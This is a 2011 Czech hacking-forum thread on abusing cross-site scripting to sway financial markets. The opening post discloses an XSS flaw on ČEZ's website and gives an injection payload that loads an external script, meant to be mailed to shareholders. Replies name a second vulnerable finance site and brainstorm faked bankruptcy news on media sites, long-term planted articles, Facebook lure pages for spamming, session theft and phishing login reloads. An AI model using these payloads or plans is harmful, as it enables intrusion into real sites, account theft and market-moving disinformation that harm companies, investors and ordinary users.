Řecká krize, XSS a ohrožení finančních trhů...

HackForum

Řecká krize, XSS a ohrožení finančních trhů...#
Dobrý den,
rozhodl jsem se napsat krátký příspěvek o tom, co asi všichni z Vás moc dobře znají, používají, ale mnozí také podceňují.
Cross-Site Scripting (XSS) je jeden z nejjednodušších možných způsobů "napadení" webového rozhraní, proti kterému není imunní stále velká část webů. Kdysi se zde na foru někdo ptal, zda je (non-persistent) XSS nějak reálně využitelný k průniku na web nebo k "napadení" dané stránky. A myslím, že to byl právě .cCuMiNn., kdo mu tenkrát odepisoval, že "čas XSS teprve příjde" a je pravděpodobné, že se tato metoda stane pro internet (potažmo náš svět...) nebezpečnější.

Mno myslím si, že čas XSS právě nadešel :). Nedovedu si představit lepší období pro XSS než to, které je nyní. Veškeré bankovnictví, finanční transakce, burza - to vše dnes probíhá přes internet. Přidejme k tomu trochu finanční krize, napětí nad osudem Řecka a slepou víru finančních trhů v ratingové agentury a máme tu skvělé podhoubí pro využití (zneužití) XSS k podlomení finančních trhů (nebo přinejmenším jejich pořádným zatřepáním). Myslíte si, že přeháním? Možná ano, ale uvažte - co kdyby někdo zneužil XSS kupříkladu k pozměnění ratingu Itálie na stránkách nějaké ratingové agentury...?! Faktem sice je, že ratingové agentury snížení ratingu (takové to vyhrožování) oznamují dopředu, nicméně statisticky vzato určitě by se našlo několik (stovek, tisíc..?) finančníků, kteří by na to skočili a začali nakupovat/prodávat akcie. Zde je ale potřeba si uvědomit, že nezanedbatelné množství z těch, kteří by na to neskočili by (ve strachu o své akcie) začali také nakupovat/prodávat , mno a protože je celosvětový trh opravdu propojený, nějaké to malé zastřesení by to vyvolat mohlo. Samozřejmě by záviselo na tom, o jaký web (jak důvěryhodný) by se jednalo, jakým způsobem by se daná informace šířila (mail, fakemail - hoax..), zda by se jednalo o persistentní nebo non-persistentní XSS apod....

No a nakonec malý příklad.

Asi se shodneme na tom, že Energetická společnost ČEZ je finančním gigantem na českém trhů. Je to akciová společnost a i když většinu akcií vlastní stát, má spoutu akcionářů, kteří v něm mají opravdu velké množství pěněz (řádově desítky až stovky milionů).

Nevím, zda je seznam těchto akcionářů věřejně dostupný (ono by se dalo i odhadnout kdo těch akcií má v ČR nejvíce...), ale jistě každý z nich má emial.

Protože jsem našel na stránkách ČEZu XSSku, šlo by to využít (zneužít) třeba takto:

[link]"/><script src="[link]"></script>


Pokud někdo z Vás má zájem, rád bych zde zahájil diskuzi právě na toto téma - tedy nebezpečí XSS ve spojení s napadením (ovlivňováním) finančních trhů.

Díky.





(odpovědět)
_ano_nymous_ | 158.194.29.*19.7.2011 11:55
re: Řecká krize, XSS a ohrožení finančních trhů...#
tak ten link tady dám ještě jednou...:

[link]
(odpovědět)
_ano_nymous_ | 158.194.29.*19.7.2011 12:11
re: Řecká krize, XSS a ohrožení finančních trhů...#
Aby se v příspěvcích nerozhazovaly linky, je potřeba proměnné zakódovat do URL kódování.

BTW1: Když teď najdeš ještě nějaké XSS na stránkách médií a skrz něj oznámíš, že se ČEZ řítí do konkurzu a uvedeš na stránkách médií odkaz na ČEZ, kde bude čekat připravený článek...

BTW2: V XSS skutečně spatřuji velikou hrozbu, ale má vidina zneužití je ve vytvoření celosvětového botnetu, kde budou po síti běhat sem a tam pouze požadavky vyvolané XSS a využívající identitu uživatelů. Stačí, abys pak navštívil nějakou stránku a hned tím spustíš vlnu XSS požadavků, které za tebe vykonají bůhvíco a bůhvíkde.

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP19.7.2011 12:16
re: Řecká krize, XSS a ohrožení finančních trhů...#
pro spekulanty pouzivajici fundamentalni analyzu zde rozhodne riziko je (i kdyz necerpaji primo ze stranek CEZu). dneska je proste nejvzacnejsim artiklem informace a jelikoz XSS umoznuje informace menit a vytvaret, jedna se zcela urcite o problem, ktery je nutne resit a nepodcenovat jej.
kdo stale neveri v potencial teto zranitelnosti, at si nastuduje informace o XSS proxy, webovych keyloggerech atp.
napr. zive.cz bylo pred nekolika lety hacknuto prave diky XSS.
(odpovědět)
Emkei | E-mail | Website | PGP19.7.2011 12:23
re: Řecká krize, XSS a ohrožení finančních trhů...#
Další pěkná XSSka potenciálně zneužitelná k ohrožení stability finančních trhů. Vzhledem k tomu, že server KURZY.CZ je komplexně zaměřen na finance, ekonomiku, různé statistiky, směnné kurzy apod., myslím si, že tu prostor pro reálné zneužití je.

[link]
(odpovědět)
_ano_nymous_ | 158.194.29.*23.7.2011 18:51
re: Řecká krize, XSS a ohrožení finančních trhů...#
To je vsechno pekmy, ale nejaky takovy pad a zpravy, ktere si nekdo precte, neskoci skoro nikdo. U zkusenych investori to nehrozi a tem svatecnim je to jedno. Nicmene, kazdy trochu uvedomelejsi investor, byt sebemene zkuseny, bude hledat u vice zdroju.
(odpovědět)
BigPenis | 77.48.106.*23.7.2011 22:57
re: Řecká krize, XSS a ohrožení finančních trhů...#
Na tohle je zapotřebí tým... Takto bych spíš nechal ztratit pár letadel, tankerů, města... několik hodin dělá divy - navíc s internetem to rychle koluje a když to bude dobře postavený, načasovaný...

No, asi by se o tom nemělo psát jen, tak...
Stejně si ale myslim, že dělat to velké a nápadné je hloupost, přece co nás přerůstá, tak tomu nedůvěřujeme. Viděl bych to na delší dobu a třeba v tisících schovanejch článcích všude možně, na styl falešné historie a za 3 roky boom! :D Asi moc fantazie....

----------
Vytváříme možnosti.
(odpovědět)
mWit24.7.2011 0:16
re: Řecká krize, XSS a ohrožení finančních trhů...#
for mWit:

To o čem píšeš mi tak trochu připomíná film The fourth kind (Čtvrtý druh), který byl naoko "based on true event". Ve filmu se jednalo o to, že na Aljašce ve městě Nome, mělo během posledních něakolika (desítek) let docházet k únosu lidí mimozemšťany. Vtip je v tom, že celý film byla fice a autoři filmu několik let před samotným natáčením různě rozhazovali v novinách falešné články, o tom jak v Nome dochází k únosů lidí mimozemšťany, platili si doborovolníky, kteří odpřísáhli , že je UFO unselo a to vše pár let předtím, než vůbec začali točit, tím si vytvořili vhodné podhoubí a již měli tuto svou iluzi na čem stavět.

PS: jinak s tebou naprosto souhlasím....

(odpovědět)
_ano_nymous_ | 158.194.29.*24.7.2011 12:47
re: Řecká krize, XSS a ohrožení finančních trhů...#
To je otazka....
Naprosta vetsina XSS der je pro hackery naprosto k nicemu!


XSS ma vyuziti:
a) Pokud je na webu, kde uzivatel nebo admin vidi po prihlaseni informace, ktere jsou pro hackera zajimave (freemaily......)
-> kradez session, prihlaseni se pod tou sessionou a kradez dat

b) Jedna-li se o persistent XSS v navstevovane casti webu, ktera je dostupna jen prihlasenym.
-> pri nacitani stranky probehne reload na phishingovy login form - uzivatel si bude myslet, ze ho to odhlasilo a zada login a heslo znovu.......

c) Jedna-li se o persistent XSS primo na strance s login formem (obvykle index webu)
-> prima kradez zadavaneho hesla

Nasledujici utoky provede utocnik jen malo kdy.

d) Je li XSS na webu nejake dulezite instituce a nachazi-li se na uveritelne adrese
-> habadura na televizaky a nasledne ovlivneni lidi

e) Ma-li nekdo zajem na likvidaci daneho webu
-> session stealing, likvidace uctu

f) Jedna-li se o utok s cilem ukrast konkretnimu uzivateli ucet.
-> session stealing

PS.
1) Neplatny listek,
2) Antispam: Vyčkejte 15 vteřin a akci opakujte
Hmmmmmmmmmm.......
(odpovědět)
StorM Troop3r | 89.190.52.*24.7.2011 16:36
re: Řecká krize, XSS a ohrožení finančních trhů...#
Grrrr.....
To byla reakce na cCuMiNna (19.7.2011 12:16) A Emkeie (19.7.2011 12:16) ohledne potencialu XSS.
(odpovědět)
StorM Troop3r | 89.190.52.*24.7.2011 16:40
re: Řecká krize, XSS a ohrožení finančních trhů...#
XSS můžeš využít i k úplně jiným věcem, než je napadení uživatelova účtu na webu, kde se XSS zranitelnost nachází (viz. série článků "Nebezpečný JavaScript"). Jakmile spustíš u uživatele vlastní kód, například využitím webu, který uživatel často navštěvuje, můžeš pak využít jeho identitu pro páchání útoků na úplně jiná místa na internetu. Můžeš si zjistit, třeba k jakým webům je uživatel přihlášen nebo zjistit něco o jeho vnitřní síti. Můžeš také zkusit exploitovat uživatelův browser a plně tak ovládnout jeho počítač. Využití XSS je opravdu hodně.

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP24.7.2011 17:12
re: Řecká krize, XSS a ohrožení finančních trhů...#
XSS tak užitečné, jak jej dokážeš zapojit do celkové strategie útoku. Neřídíme se přeci podle nějakých kodexů jak to provádět, my to přece provádíme originálně, tak abychom obešli a pronikli dovnitra. Nebo, ne?

_ano_nymous_: I dneska tomu filmu věří hodně lidí. Myslíš, že se dá trh zpomalit, nebo zrychlit či nechat stagnovat... a jaký by to mělo dopad (i přes omezení provedení) na Nás, co trh internetové komunikace, internetových reklam... Nemám tolik času and tím přemýšlet, ale určitě, čím víc věcí s tím dokážem propojit tím větší bude účinek???

----------
Vytváříme možnosti.
(odpovědět)
mWit24.7.2011 19:15
re: Řecká krize, XSS a ohrožení finančních trhů...#
az budes umet alespon tretinu veci, co lze pomoci XSS realizovat, tak se vrat a teprve reaguj (nic ve zlem, ale tvoje prvni veta je jasnym dukazem toho, ze tomu tak momentalne neni).
(odpovědět)
Emkei | E-mail | Website | PGP24.7.2011 21:26
re: Řecká krize, XSS a ohrožení finančních trhů...#
Ok, persistent XSS se da vyuzit ke spousteni hromadnych utoku. (Otazka je, jak moc uspesne, viz nize) Nonpersistent XSS jde pouzit jeste pri CSRF utoku proti aplikaci ktera kontroluje domenu v referreru....

Je otazka, zda utoky, ktere jdou spustit bez ohledu na domenu, na ktere pobezi (napriklad exploitace browseru skenovani LAN, CSS history leak atp.) ma vubec cenu spoustet pres nonpersistent XSS. Ja si to nemyslim. Uzivatel sice mozna ziska pocit bezpecne domeny, ale zase to muzou stopnout ruzne anti XSS filtry atp. Navic existuji mnohem lepsi zpusoby, jak dostat odkaz ke spouste lidi.
Na takove utoky bych pouzil spise neco jako [link] 17k uzivatelu je prece jen hodne oproti XSS. Natoz nonpersistentnimu.

Staci lakave tema a lidi se najde dost:
[link]ý-zpět-STARÝ-CHAT-ZDE/143828589028693 sice je to jen stranka, ale i kdyby misto toho nekdo dal odkaz (a udelal to jako vyse), tak tam tech lidi prijde porad spousta. I kdyby na to klepla jen ctvrtina lidi, tak je to porad hodne solidnich 50k.....
(odpovědět)
StorM Troop3r | 89.190.52.*25.7.2011 12:50
re: Řecká krize, XSS a ohrožení finančních trhů...#
[link]ý-zpět-STARÝ-CHAT-ZDE/143828589028693
(odpovědět)
StorM Troop3r | 89.190.52.*25.7.2011 12:52
re: Řecká krize, XSS a ohrožení finančních trhů...#
Hmmm...
facebook.com/pages/Aktivuj-si-starý-zpět-ST
ARÝ-CHAT-ZDE/143828589028693
(odpovědět)
StorM Troop3r | 89.190.52.*25.7.2011 12:53
re: Řecká krize, XSS a ohrožení finančních trhů...#
Pánové, chce to klid. Někteří jedinci si pletou pojmy. XSS není o krádeži sessny nebo dat, ani o přesměrování na podvrženou stránku. XSS je chyba (ve validaci vstupu aplikace), krádež sessny (tak, jak je zde chápána) je využití chyby typu XSS v kombinaci s technologií JavaScript ke krádeži sessny. A to je podstatný rozdíl! XSS je prostředek ke spuštění/využití dalších technologií. Stejná situace, jiná technologie: SQL injection je chyba (ve validaci vstupu aplikace), dropnutí shellu pomocí SQL injection je využití chyby typu SQLi a možností jazyka SQL vytvořit a naplnit soubor.

----------
Sec-Cave.cz - [link]
HellSec.cz - [link]
(odpovědět)
RubberDuck | E-mail | Website24.7.2011 21:57
re: Řecká krize, XSS a ohrožení finančních trhů...#
Tady přece diskutujeme ve větším měřítku, myslím, že se moc zaobíráš sebou. Tvoje facebookové skupiny nalákají blbečky, nám tu jde ale o globální účast bez ohledu na skupinu a začlenění, protože přes ně se to dostane dál díky komunikaci a nabere to ještě na důvěře, dokud se to nezpochybní.

Umíš ty skupiny rozšiřovat a slučovat bez ohledu na téma, tak aby byli všechny propojené? ;) Zajistilo by ti to pak efektivnější spamování mít víc takovejch kanálů...


_ano_nymous_: Zpátky k trhům. Co společnosti, které jsou málo známé, nebo společnosti, které zajišťují dodávky do větších podniků. Vyřazení logistiky je přece těžká rána a navíc tu pomůže fakt, že to může být lež protože ty velké firmy to budou stejně popírat - šli by do ztrát pokud by se jim zastavila produkce.... (zastavila na oko, firemní produkce a celkový zisk je přece vyhodnocen v Quartálech roku, ne?..teda abych se nemýlil tohle je spíš pro někoho jiného...:D

----------
Vytváříme možnosti.
(odpovědět)
mWit25.7.2011 14:40
re: Řecká krize, XSS a ohrožení finančních trhů...#
Vliv reflexivniho XSS bych neprecenoval. To je vec, kterou zvladne kazdy tiskovy mluvci okecat. Co do skody pro povest bych to srovnal se spamem.

Myslim, ze velke spolecnosti maji problem spis v tom, ze jsou velke a leva ruka nevi, co dela ta prava. A tak nebyva problem najit chyby mnohem zavaznejsi nez reflexivni XSS, pomoci nichz je mozne lepe cilit na jednotlive uzivatele.
(odpovědět)
nhn | 85.162.192.101/127.0.0.*1.8.2011 1:20
re: Řecká krize, XSS a ohrožení finančních trhů...#
např..?
(odpovědět)
_ano_nymous_ | 158.194.29.*1.8.2011 13:45
re: Řecká krize, XSS a ohrožení finančních trhů...#
Napr. chyby v konfiguraci, defaultni hesla, opustene testovaci aplikace, zname aplikace v prastarych verzich casto obsahujici i zname chyby, home-made kryptografie, ...

(odpovědět)
nhn | 85.161.248.*1.8.2011 22:42

Zpět
 
 
 

 
BBCode